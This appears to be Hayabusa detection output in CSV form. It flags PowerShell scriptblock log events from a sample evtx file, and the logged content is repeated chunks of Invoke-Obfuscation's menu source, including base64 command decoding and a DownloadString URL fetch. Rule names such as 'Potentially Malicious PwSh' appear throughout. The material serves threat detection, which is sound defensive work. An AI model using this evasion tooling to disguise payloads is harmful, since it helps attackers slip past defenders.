$TutorialInputOptions = @(@('tutorial') , "" of how to use this tool `t "" ) $MenuInputOptionsShowHelp = @(@('help','get-help','?','-?','/?','menu'), ""Show this Menu `t "" ) $MenuInputOptionsShowOptions = @(@('show options','show','options') , "" for payload to obfuscate `t "" ) $ClearScreenInputOptions = @(@('clear','clear-host','cls') , "" screen `t "" ) $CopyToClipboardInputOptions = @(@('copy','clip','clipboard') , "" ObfuscatedCommand to clipboard `t "" ) $OutputToDiskInputOptions = @(@('out') , ""Write ObfuscatedCommand to disk `t "" ) $ExecutionInputOptions = @(@('exec','execute','test','run') , "" ObfuscatedCommand locally `t "" ) $ResetObfuscationInputOptions = @(@('reset') , "" ALL obfuscation for ObfuscatedCommand "") $UndoObfuscationInputOptions = @(@('undo') , "" LAST obfuscation for ObfuscatedCommand "") $BackCommandInputOptions = @(@('back','cd ..') , ""Go to previous obfuscation menu `t "" ) $ExitCommandInputOptions = @(@('quit','exit') , "" Invoke-Obfuscation `t "" ) $HomeMenuInputOptions = @(@('home','main') , ""Return to Menu `t "" ) # For Version 1.0 ASCII art is not necessary. #$ShowAsciiArtInputOptions = @(@('ascii') , ""Display random art for the lulz :)`t"") # Add all above input options lists to be displayed in SHOW OPTIONS menu. 
$AllAvailableInputOptionsLists = @() $AllAvailableInputOptionsLists += , $TutorialInputOptions $AllAvailableInputOptionsLists += , $MenuInputOptionsShowHelp $AllAvailableInputOptionsLists += , $MenuInputOptionsShowOptions $AllAvailableInputOptionsLists += , $ClearScreenInputOptions $AllAvailableInputOptionsLists += , $ExecutionInputOptions $AllAvailableInputOptionsLists += , $CopyToClipboardInputOptions $AllAvailableInputOptionsLists += , $OutputToDiskInputOptions $AllAvailableInputOptionsLists += , $ResetObfuscationInputOptions $AllAvailableInputOptionsLists += , $UndoObfuscationInputOptions $AllAvailableInputOptionsLists += , $BackCommandInputOptions $AllAvailableInputOptionsLists += , $ExitCommandInputOptions $AllAvailableInputOptionsLists += , $HomeMenuInputOptions # For Version 1.0 ASCII art is not necessary. #$AllAvailableInputOptionsLists += , $ShowAsciiArtInputOptions # Input options to change interactive menus. $ExitInputOptions = $ExitCommandInputOptions[0] $MenuInputOptions = $BackCommandInputOptions[0] # Obligatory ASCII Art. Show-AsciiArt Start-Sleep -Seconds 2 # Show Help Menu once at beginning of script. Show-HelpMenu # Main loop for user interaction. Show-Menu function displays current function along with acceptable input options (defined in arrays instantiated above). # User input and validation is handled within Show-Menu. $UserResponse = '' While($ExitInputOptions -NotContains ([String]$UserResponse).ToLower()) { $UserResponse = ([String]$UserResponse).Trim() If($HomeMenuInputOptions[0] -Contains ([String]$UserResponse).ToLower()) { $UserResponse = '' } # Display menu if it is defined in a menu variable with $UserResponse in the variable name. 
If(Test-Path ('Variable:' + ""MenuLevel$UserResponse"")) { $UserResponse = Show-Menu (Get-Variable ""MenuLevel$UserResponse"").Value $UserResponse $Script:OptionsMenu } Else { Write-Error ""The variable MenuLevel$UserResponse does not exist."" $UserResponse = 'quit' } If(($UserResponse -eq 'quit') -AND $CliWasSpecified -AND !$NoExitWasSpecified) { Write-Host ""`n`nOutputting ObfuscatedCommand to stdout and exiting since -Command was specified and -NoExit was not specified:`n"" Write-Output $Script:ObfuscatedCommand.Trim(""`n"") $UserInput = 'quit' } } } # Get location of this script no matter what the current directory is for the process executing this script. $ScriptDir = [System.IO.Path]::GetDirectoryName($myInvocation.MyCommand.Definition) Function Show-Menu { <# .SYNOPSIS HELPER FUNCTION :: Displays current menu with obfuscation navigation and application options for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Menu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Menu displays current menu with obfuscation navigation and application options for Invoke-Obfuscation. .PARAMETER Menu Specifies the menu options to display, with acceptable input options parsed out of this array. .PARAMETER MenuName Specifies the menu header display and the breadcrumb used in the interactive prompt display. .PARAMETER Script:OptionsMenu Specifies the script-wide variable containing additional acceptable input in addition to each menu's specific acceptable input (e.g. EXIT, QUIT, BACK, HOME, MAIN, etc.). .EXAMPLE C:\PS> Show-Menu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Param( [Parameter(ValueFromPipeline = $true)] [ValidateNotNullOrEmpty()] [Object[]] $Menu, [String] $MenuName, [Object[]] $Script:OptionsMenu ) # Extract all acceptable values from $Menu. 
$AcceptableInput = @() $SelectionContainsCommand = $FALSE ForEach($Line in $Menu) { # If there are 4 items in each $Line in $Menu then the fourth item is a command to exec if selected. If($Line.Count -eq 4) { $SelectionContainsCommand = $TRUE } $AcceptableInput += ($Line[1]).Trim(' ') } $UserInput = $NULL While($AcceptableInput -NotContains $UserInput) { # Format custom breadcrumb prompt. Write-Host ""`n"" $BreadCrumb = $MenuName.Trim('_') If($BreadCrumb.Length -gt 1) { If($BreadCrumb.ToLower() -eq 'show options') { $BreadCrumb = 'Show Options' } If($MenuName -ne '') { # Handle specific case substitutions from what is ALL CAPS in interactive menu and then correct casing we want to appear in the Breadcrumb. $BreadCrumbOCD = @() $BreadCrumbOCD += , @('ps' ,'PS') $BreadCrumbOCD += , @('cmd' ,'Cmd') $BreadCrumbOCD += , @('wmic' ,'Wmic') $BreadCrumbOCD += , @('rundll' ,'RunDll') $BreadCrumbOCD += , @('var+' ,'Var+') $BreadCrumbOCD += , @('stdin+' ,'StdIn+') $BreadCrumbOCD += , @('clip+' ,'Clip+') $BreadCrumbOCD += , @('var++' ,'Var++') $BreadCrumbOCD += , @('stdin++' ,'StdIn++') $BreadCrumbOCD += , @('clip++' ,'Clip++') $BreadCrumbOCD += , @('rundll++','RunDll++') $BreadCrumbOCD += , @('mshta++' ,'Mshta++') $BreadCrumbArray = @() ForEach($Crumb in $BreadCrumb.Split('_')) { # Perform casing substitutions for any matches in $BreadCrumbOCD array. $StillLookingForSubstitution = $TRUE ForEach($Substitution in $BreadCrumbOCD) { If($Crumb.ToLower() -eq $Substitution[0]) { $BreadCrumbArray += $Substitution[1] $StillLookingForSubstitution = $FALSE } } # If no substitution occurred above then simply upper-case the first character and lower-case all the remaining characters. 
If($StillLookingForSubstitution) { $BreadCrumbArray += $Crumb.SubString(0,1).ToUppe",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"r() + $Crumb.SubString(1).ToLower() # If no substitution was found for the 3rd or later BreadCrumb element (only for Launcher BreadCrumb) then throw a warning so we can add this substitution pair to $BreadCrumbOCD. If(($BreadCrumb.Split('_').Count -eq 2) -AND ($BreadCrumb.StartsWith('Launcher_')) -AND ($Crumb -ne 'Launcher')) { Write-Warning ""No substituion pair was found for `$Crumb=$Crumb in `$BreadCrumb=$BreadCrumb. Add this `$Crumb substitution pair to `$BreadCrumbOCD array in Invoke-Obfuscation."" } } } $BreadCrumb = $BreadCrumbArray -Join '\' } $BreadCrumb = '\' + $BreadCrumb } # Output menu heading. $FirstLine = ""Choose one of the below "" If($BreadCrumb -ne '') { $FirstLine = $FirstLine + $BreadCrumb.Trim('\') + ' ' } Write-Host ""$FirstLine"" -NoNewLine # Change color and verbiage if selection will execute command. If($SelectionContainsCommand) { Write-Host ""options"" -NoNewLine -ForegroundColor Green Write-Host "" to"" -NoNewLine Write-Host "" APPLY"" -NoNewLine -ForegroundColor Green Write-Host "" to current payload"" -NoNewLine } Else { Write-Host ""options"" -NoNewLine -ForegroundColor Yellow } Write-Host "":`n"" ForEach($Line in $Menu) { $LineSpace = $Line[0] $LineOption = $Line[1] $LineValue = $Line[2] Write-Host $LineSpace -NoNewLine # If not empty then include breadcrumb in $LineOption output (is not colored and won't affect user input syntax). 
If(($BreadCrumb -ne '') -AND ($LineSpace.StartsWith('['))) { Write-Host ($BreadCrumb.ToUpper().Trim('\') + '\') -NoNewLine } # Change color if selection will execute command. If($SelectionContainsCommand) { Write-Host $LineOption -NoNewLine -ForegroundColor Green } Else { Write-Host $LineOption -NoNewLine -ForegroundColor Yellow } # Add additional coloring to string encapsulated by <> if it exists in $LineValue. If($LineValue.Contains('<') -AND $LineValue.Contains('>')) { $FirstPart = $LineValue.SubString(0,$LineValue.IndexOf('<')) $MiddlePart = $LineValue.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $LineValue.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""`t$FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan # Handle if more than one term needs to be output in different color. If($LastPart.Contains('<') -AND $LastPart.Contains('>')) { $LineValue = $LastPart $FirstPart = $LineValue.SubString(0,$LineValue.IndexOf('<')) $MiddlePart = $LineValue.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $LineValue.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan } Write-Host $LastPart } Else { Write-Host ""`t$LineValue"" } } # Prompt for user input with custom breadcrumb prompt. Write-Host '' If($UserInput -ne '') {Write-Host ''} $UserInput = '' While(($UserInput -eq '') -AND ($Script:CompoundCommand.Count -eq 0)) { # Output custom prompt. Write-Host ""Invoke-Obfuscation$BreadCrumb> "" -NoNewLine -ForegroundColor Magenta # Get interactive user input if CliCommands input variable was not specified by user. 
If(($Script:CliCommands.Count -gt 0) -OR ($Script:CliCommands -ne $NULL)) { If($Script:CliCommands.GetType().Name -eq 'String') { $NextCliCommand = $Script:CliCommands.Trim() $Script:CliCommands = @() } Else { $NextCliCommand = ([String]$Script:CliCommands[0]).Trim() $Script:CliCommands = For($i=1; $i -lt $Script:CliCommands.Count; $i++) {$Script:CliCommands[$i]} } $UserInput = $NextCliCommand } Else { # If Command was defined on command line and NoExit switch was not defined then output final ObfuscatedCommand to stdout and then quit. Otherwise continue with interactive Invoke-Obfuscation. If($CliWasSpecified -AND ($Script:CliCommands.Count -lt 1) -AND ($Script:CompoundCommand.Count -lt 1) -AND ($Script:QuietWasSpecified -OR !$NoExitWasSpecified)) { If($Script:QuietWasSpecified) { # Remove Write-Host and Start-Sleep proxy functions so that Write-Host and Start-Sleep cmdlets will be called during the remainder of the interactive Invoke-Obfuscation session. Remove-Item -Path Function:Write-Host Remove-Item -Path Function:Start-Sleep $Script:QuietWasSpecified = $FALSE # Automatically run 'Show Options' so the user has context of what has successfully been executed. $UserInput = 'show options' $BreadCrumb = 'Show Options' } # -NoExit wasn't specified and -Command was, so we will output the result back in the main While loop. If(!$NoExitWasSpecified) { $UserInput = 'quit' } } Else { $UserInput = (Read-Host).Trim() } # Process interactive UserInput using CLI syntax, so comma-delimited and slash-delimited commands can be processed interactively. If(($Script:CliCommands.Count -eq 0) -AND !$UserInput.ToLower().StartsWith('set ') -AND $UserInput.Contains(',')) { $Script:CliCommands = $UserInput.Split(',') # Reset $UserInput so current While loop will be traversed once more and process UserInput command as a CliCommand. $UserInput = '' } } } # Trim any leading trailing slashes so it doesn't misinterpret it as a compound command unnecessarily. 
$UserInput = $UserInput.Trim('/\') # Cause UserInput of base menu level directories to automatically work. # The only exception is STRING if the current MenuName is _token since it can be the base menu STRING or TOKEN/STRING. If((($MenuLevel | ForEach-Object {$_[1].Trim()}) -Contains $UserInput.Split('/\')[0]) -AND !(('string' -Contains $UserInput.Split('/\')[0]) -AND ($MenuName -eq '_token')) -AND ($MenuName -ne '')) { $UserInput = 'home/' + $UserInput.Trim() } # If current command contains \ or / and does not start with SET or OUT then we are dealing with a compound command. # Setting $Script:CompounCommand in below IF block. If(($Script:CompoundCommand.Count -eq 0) -AND !$UserInput.ToLower().StartsWith('set ') -AND !$UserInput.ToLower().StartsWith('out ') -AND ($UserInput.Contains('\') -OR $UserInput.Contains('/'))) { $Script:CompoundCommand = $UserInput.Split('/\') } # If current command contains \ or / and does not start with SET then we are dealing with a compound command. # Parsing out next command from $Script:CompounCommand in below IF block. If($Script:CompoundCommand.Count -gt 0) { $UserInput = '' While(($UserInput -eq '') -AND ($Script:CompoundCommand.Count -gt 0)) { # If last compound command then it will be a string. If($Script:CompoundCommand.GetType().Name -eq 'String') { $NextCompoundCommand = $Script:CompoundCommand.Trim() $Script:CompoundCommand = @() } Else { # If there are more commands left in compound command then it won't be a string (above IF block). # In this else block we get the next command from CompoundCommand array. $NextCompoundCommand = ([String]$Script:CompoundCommand[0]).Trim() # Set remaining commands back into CompoundCommand. $Temp = $Script:CompoundCommand $Script:CompoundCommand = @() For($i=1; $i -lt $Temp.Count; $i++) { $Script:CompoundCommand += $Temp[$i] } } $UserInput = $NextCompoundCommand } } # Handle new RegEx functionality. 
# Identify if there is any regex in current UserInput by removing all alphanumeric characters (and + or # which are found in launcher names). $TempUserInput = $UserInput.ToLower() @(97..122) | ForEach-Object {$TempUserInput = $TempUserInput.Replace([String]([Char]$_),'')} @(0..9) | ForEach-Object {$TempUserInput = $TempUserInput.Replace($_,'')} $TempUserInput = $TempUserInput.Replace(' ','').Replace('+','').Replace('#','').Replace('\','').Replace('/','').Replace('-','').Replace('?','') If(($TempUserInput.Length -gt 0) -AND !($UserInput.Trim().ToLower().StartsWith('set ')) -AND !($UserInput.Trim().ToLower().StartsWith('out '))) { # Replace any simple wildcard with .* syntax. $UserInput = $UserInput.Replace('.*','_____').Replace('*','.*').Replace('_____','.*') # Prepend UserInput with ^ and append with $ if not already there. If(!$UserInput.Trim().StartsWith('^') -AND !$UserInput.Trim().StartsWith('.*')) { $UserInput = '^' + $UserInput } If(!$UserInput.Trim().EndsWith('$') -AND !$UserInput.Trim().EndsWith('.*')) { $UserInput = $UserInput + '$' } # See if there are any filtered matches in the current menu. Try { $MenuFiltered = ($Menu | Where-Object {($_[1].Trim() -Match $UserInput) -AND ($_[1].Trim().Length -gt 0)} | ForEach-Object {$_[1].Trim()}) } Catch { # Output error message if Regular Expression causes error in ab",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"r() + $Crumb.SubString(1).ToLower() # If no substitution was found for the 3rd or later BreadCrumb element (only for Launcher BreadCrumb) then throw a warning so we can add this substitution pair to $BreadCrumbOCD. 
If(($BreadCrumb.Split('_').Count -eq 2) -AND ($BreadCrumb.StartsWith('Launcher_')) -AND ($Crumb -ne 'Launcher')) { Write-Warning ""No substituion pair was found for `$Crumb=$Crumb in `$BreadCrumb=$BreadCrumb. Add this `$Crumb substitution pair to `$BreadCrumbOCD array in Invoke-Obfuscation."" } } } $BreadCrumb = $BreadCrumbArray -Join '\' } $BreadCrumb = '\' + $BreadCrumb } # Output menu heading. $FirstLine = ""Choose one of the below "" If($BreadCrumb -ne '') { $FirstLine = $FirstLine + $BreadCrumb.Trim('\') + ' ' } Write-Host ""$FirstLine"" -NoNewLine # Change color and verbiage if selection will execute command. If($SelectionContainsCommand) { Write-Host ""options"" -NoNewLine -ForegroundColor Green Write-Host "" to"" -NoNewLine Write-Host "" APPLY"" -NoNewLine -ForegroundColor Green Write-Host "" to current payload"" -NoNewLine } Else { Write-Host ""options"" -NoNewLine -ForegroundColor Yellow } Write-Host "":`n"" ForEach($Line in $Menu) { $LineSpace = $Line[0] $LineOption = $Line[1] $LineValue = $Line[2] Write-Host $LineSpace -NoNewLine # If not empty then include breadcrumb in $LineOption output (is not colored and won't affect user input syntax). If(($BreadCrumb -ne '') -AND ($LineSpace.StartsWith('['))) { Write-Host ($BreadCrumb.ToUpper().Trim('\') + '\') -NoNewLine } # Change color if selection will execute command. If($SelectionContainsCommand) { Write-Host $LineOption -NoNewLine -ForegroundColor Green } Else { Write-Host $LineOption -NoNewLine -ForegroundColor Yellow } # Add additional coloring to string encapsulated by <> if it exists in $LineValue. 
If($LineValue.Contains('<') -AND $LineValue.Contains('>')) { $FirstPart = $LineValue.SubString(0,$LineValue.IndexOf('<')) $MiddlePart = $LineValue.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $LineValue.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""`t$FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan # Handle if more than one term needs to be output in different color. If($LastPart.Contains('<') -AND $LastPart.Contains('>')) { $LineValue = $LastPart $FirstPart = $LineValue.SubString(0,$LineValue.IndexOf('<')) $MiddlePart = $LineValue.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $LineValue.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan } Write-Host $LastPart } Else { Write-Host ""`t$LineValue"" } } # Prompt for user input with custom breadcrumb prompt. Write-Host '' If($UserInput -ne '') {Write-Host ''} $UserInput = '' While(($UserInput -eq '') -AND ($Script:CompoundCommand.Count -eq 0)) { # Output custom prompt. Write-Host ""Invoke-Obfuscation$BreadCrumb> "" -NoNewLine -ForegroundColor Magenta # Get interactive user input if CliCommands input variable was not specified by user. If(($Script:CliCommands.Count -gt 0) -OR ($Script:CliCommands -ne $NULL)) { If($Script:CliCommands.GetType().Name -eq 'String') { $NextCliCommand = $Script:CliCommands.Trim() $Script:CliCommands = @() } Else { $NextCliCommand = ([String]$Script:CliCommands[0]).Trim() $Script:CliCommands = For($i=1; $i -lt $Script:CliCommands.Count; $i++) {$Script:CliCommands[$i]} } $UserInput = $NextCliCommand } Else { # If Command was defined on command line and NoExit switch was not defined then output final ObfuscatedCommand to stdout and then quit. Otherwise continue with interactive Invoke-Obfuscation. 
If($CliWasSpecified -AND ($Script:CliCommands.Count -lt 1) -AND ($Script:CompoundCommand.Count -lt 1) -AND ($Script:QuietWasSpecified -OR !$NoExitWasSpecified)) { If($Script:QuietWasSpecified) { # Remove Write-Host and Start-Sleep proxy functions so that Write-Host and Start-Sleep cmdlets will be called during the remainder of the interactive Invoke-Obfuscation session. Remove-Item -Path Function:Write-Host Remove-Item -Path Function:Start-Sleep $Script:QuietWasSpecified = $FALSE # Automatically run 'Show Options' so the user has context of what has successfully been executed. $UserInput = 'show options' $BreadCrumb = 'Show Options' } # -NoExit wasn't specified and -Command was, so we will output the result back in the main While loop. If(!$NoExitWasSpecified) { $UserInput = 'quit' } } Else { $UserInput = (Read-Host).Trim() } # Process interactive UserInput using CLI syntax, so comma-delimited and slash-delimited commands can be processed interactively. If(($Script:CliCommands.Count -eq 0) -AND !$UserInput.ToLower().StartsWith('set ') -AND $UserInput.Contains(',')) { $Script:CliCommands = $UserInput.Split(',') # Reset $UserInput so current While loop will be traversed once more and process UserInput command as a CliCommand. $UserInput = '' } } } # Trim any leading trailing slashes so it doesn't misinterpret it as a compound command unnecessarily. $UserInput = $UserInput.Trim('/\') # Cause UserInput of base menu level directories to automatically work. # The only exception is STRING if the current MenuName is _token since it can be the base menu STRING or TOKEN/STRING. If((($MenuLevel | ForEach-Object {$_[1].Trim()}) -Contains $UserInput.Split('/\')[0]) -AND !(('string' -Contains $UserInput.Split('/\')[0]) -AND ($MenuName -eq '_token')) -AND ($MenuName -ne '')) { $UserInput = 'home/' + $UserInput.Trim() } # If current command contains \ or / and does not start with SET or OUT then we are dealing with a compound command. 
# Setting $Script:CompounCommand in below IF block. If(($Script:CompoundCommand.Count -eq 0) -AND !$UserInput.ToLower().StartsWith('set ') -AND !$UserInput.ToLower().StartsWith('out ') -AND ($UserInput.Contains('\') -OR $UserInput.Contains('/'))) { $Script:CompoundCommand = $UserInput.Split('/\') } # If current command contains \ or / and does not start with SET then we are dealing with a compound command. # Parsing out next command from $Script:CompounCommand in below IF block. If($Script:CompoundCommand.Count -gt 0) { $UserInput = '' While(($UserInput -eq '') -AND ($Script:CompoundCommand.Count -gt 0)) { # If last compound command then it will be a string. If($Script:CompoundCommand.GetType().Name -eq 'String') { $NextCompoundCommand = $Script:CompoundCommand.Trim() $Script:CompoundCommand = @() } Else { # If there are more commands left in compound command then it won't be a string (above IF block). # In this else block we get the next command from CompoundCommand array. $NextCompoundCommand = ([String]$Script:CompoundCommand[0]).Trim() # Set remaining commands back into CompoundCommand. $Temp = $Script:CompoundCommand $Script:CompoundCommand = @() For($i=1; $i -lt $Temp.Count; $i++) { $Script:CompoundCommand += $Temp[$i] } } $UserInput = $NextCompoundCommand } } # Handle new RegEx functionality. # Identify if there is any regex in current UserInput by removing all alphanumeric characters (and + or # which are found in launcher names). 
$TempUserInput = $UserInput.ToLower() @(97..122) | ForEach-Object {$TempUserInput = $TempUserInput.Replace([String]([Char]$_),'')} @(0..9) | ForEach-Object {$TempUserInput = $TempUserInput.Replace($_,'')} $TempUserInput = $TempUserInput.Replace(' ','').Replace('+','').Replace('#','').Replace('\','').Replace('/','').Replace('-','').Replace('?','') If(($TempUserInput.Length -gt 0) -AND !($UserInput.Trim().ToLower().StartsWith('set ')) -AND !($UserInput.Trim().ToLower().StartsWith('out '))) { # Replace any simple wildcard with .* syntax. $UserInput = $UserInput.Replace('.*','_____').Replace('*','.*').Replace('_____','.*') # Prepend UserInput with ^ and append with $ if not already there. If(!$UserInput.Trim().StartsWith('^') -AND !$UserInput.Trim().StartsWith('.*')) { $UserInput = '^' + $UserInput } If(!$UserInput.Trim().EndsWith('$') -AND !$UserInput.Trim().EndsWith('.*')) { $UserInput = $UserInput + '$' } # See if there are any filtered matches in the current menu. Try { $MenuFiltered = ($Menu | Where-Object {($_[1].Trim() -Match $UserInput) -AND ($_[1].Trim().Length -gt 0)} | ForEach-Object {$_[1].Trim()}) } Catch { # Output error message if Regular Expression causes error in ab",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,low,Evas,Use Remove-Item to Delete File,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_remove_item_path.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"ove filtering step. # E.g. 
Using *+ instead of *[+] Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' The current Regular Expression caused the following error:' write-host "" $_"" -ForegroundColor Red } # If there are filtered matches in the current menu then randomly choose one for the UserInput value. If($MenuFiltered -ne $NULL) { # Randomly select UserInput from filtered options. $UserInput = (Get-Random -Input $MenuFiltered).Trim() # Output randomly chosen option (and filtered options selected from) if more than one option were returned from regex. If($MenuFiltered.Count -gt 1) { # Change color and verbiage if acceptable options will execute an obfuscation function. If($SelectionContainsCommand) { $ColorToOutput = 'Green' } Else { $ColorToOutput = 'Yellow' } Write-Host ""`n`nRandomly selected "" -NoNewline Write-Host $UserInput -NoNewline -ForegroundColor $ColorToOutput write-host "" from the following filtered options: "" -NoNewline For($i=0; $i -lt $MenuFiltered.Count-1; $i++) { Write-Host $MenuFiltered[$i].Trim() -NoNewLine -ForegroundColor $ColorToOutput Write-Host ', ' -NoNewLine } Write-Host $MenuFiltered[$MenuFiltered.Count-1].Trim() -NoNewLine -ForegroundColor $ColorToOutput } } } # If $UserInput is all numbers and is in a menu in $MenusWithMultiSelectNumbers $OverrideAcceptableInput = $FALSE $MenusWithMultiSelectNumbers = @('\Launcher') If(($UserInput.Trim(' 0123456789').Length -eq 0) -AND $BreadCrumb.Contains('\') -AND ($MenusWithMultiSelectNumbers -Contains $BreadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\')))) { $OverrideAcceptableInput = $TRUE } If($ExitInputOptions -Contains $UserInput.ToLower()) { Return $ExitInputOptions[0] } ElseIf($MenuInputOptions -Contains $UserInput.ToLower()) { # Commands like 'back' that will return user to previous interactive menu. 
If($BreadCrumb.Contains('\')) {$UserInput = $BreadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\')).Replace('\','_')} Else {$UserInput = ''} Return $UserInput.ToLower() } ElseIf($HomeMenuInputOptions[0] -Contains $UserInput.ToLower()) { Return $UserInput.ToLower() } ElseIf($UserInput.ToLower().StartsWith('set ')) { # Extract $UserInputOptionName and $UserInputOptionValue from $UserInput SET command. $UserInputOptionName = $NULL $UserInputOptionValue = $NULL $HasError = $FALSE $UserInputMinusSet = $UserInput.SubString(4).Trim() If($UserInputMinusSet.IndexOf(' ') -eq -1) { $HasError = $TRUE $UserInputOptionName = $UserInputMinusSet.Trim() } Else { $UserInputOptionName = $UserInputMinusSet.SubString(0,$UserInputMinusSet.IndexOf(' ')).Trim().ToLower() $UserInputOptionValue = $UserInputMinusSet.SubString($UserInputMinusSet.IndexOf(' ')).Trim() } # Validate that $UserInputOptionName is defined in $SettableInputOptions. If($SettableInputOptions -Contains $UserInputOptionName) { # Perform separate validation for $UserInputOptionValue before setting value. Set to 'emptyvalue' if no value was entered. If($UserInputOptionValue.Length -eq 0) {$UserInputOptionName = 'emptyvalue'} Switch($UserInputOptionName.ToLower()) { 'scriptpath' { If($UserInputOptionValue -AND ((Test-Path $UserInputOptionValue) -OR ($UserInputOptionValue -Match '(http|https)://'))) { # Reset ScriptBlock in case it contained a value. $Script:ScriptBlock = '' # Check if user-input ScriptPath is a URL or a directory. If($UserInputOptionValue -Match '(http|https)://') { # ScriptPath is a URL. # Download content. $Script:ScriptBlock = (New-Object Net.WebClient).DownloadString($UserInputOptionValue) # Set script-wide variables for future reference. 
$Script:ScriptPath = $UserInputOptionValue $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $Script:ScriptBlock $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptPath (as URL):"" -ForegroundColor Cyan Write-Host $Script:ScriptPath -ForegroundColor Magenta } ElseIf ((Get-Item $UserInputOptionValue) -is [System.IO.DirectoryInfo]) { # ScriptPath does not exist. Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' Path is a directory instead of a file (' -NoNewLine Write-Host ""$UserInputOptionValue"" -NoNewLine -ForegroundColor Cyan Write-Host "").`n"" -NoNewLine } Else { # Read contents from user-input ScriptPath value. Get-ChildItem $UserInputOptionValue -ErrorAction Stop | Out-Null $Script:ScriptBlock = [IO.File]::ReadAllText((Resolve-Path $UserInputOptionValue)) # Set script-wide variables for future reference. $Script:ScriptPath = $UserInputOptionValue $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $Script:ScriptBlock $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptPath:"" -ForegroundColor Cyan Write-Host $Script:ScriptPath -ForegroundColor Magenta } } Else { # ScriptPath not found (failed Test-Path). Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' Path not found (' -NoNewLine Write-Host ""$UserInputOptionValue"" -NoNewLine -ForegroundColor Cyan Write-Host "").`n"" -NoNewLine } } 'scriptblock' { # Remove evenly paired {} '' or """" if user includes it around their scriptblock input. 
ForEach($Char in @(@('{','}'),@('""','""'),@(""'"",""'""))) { While($UserInputOptionValue.StartsWith($Char[0]) -AND $UserInputOptionValue.EndsWith($Char[1])) { $UserInputOptionValue = $UserInputOptionValue.SubString(1,$UserInputOptionValue.Length-2).Trim() } } # Check if input is PowerShell encoded command syntax so we can decode for scriptblock. If($UserInputOptionValue -Match 'powershell(.exe | )\s*-(e |ec |en |enc |enco |encod |encode)\s*[""'']*[a-z=]') { # Extract encoded command. $EncodedCommand = $UserInputOptionValue.SubString($UserInputOptionValue.ToLower().IndexOf(' -e')+3) $EncodedCommand = $EncodedCommand.SubString($EncodedCommand.IndexOf(' ')).Trim("" '`"""") # Decode Unicode-encoded $EncodedCommand $UserInputOptionValue = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedCommand)) } # Set script-wide variables for future reference. $Script:ScriptPath = 'N/A' $Script:ScriptBlock = $UserInputOptionValue $Script:ObfuscatedCommand = $UserInputOptionValue $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $UserInputOptionValue $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptBlock:"" -ForegroundColor Cyan Write-Host $Script:ScriptBlock -ForegroundColor Magenta } 'emptyvalue' { # No OPTIONVALUE was entered after OPTIONNAME. $HasError = $TRUE Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' No value was entered after' -NoNewLine Write-Host ' SCRIPTBLOCK/SCRIPTPATH' -NoNewLine -ForegroundColor Cyan Write-Host '.' 
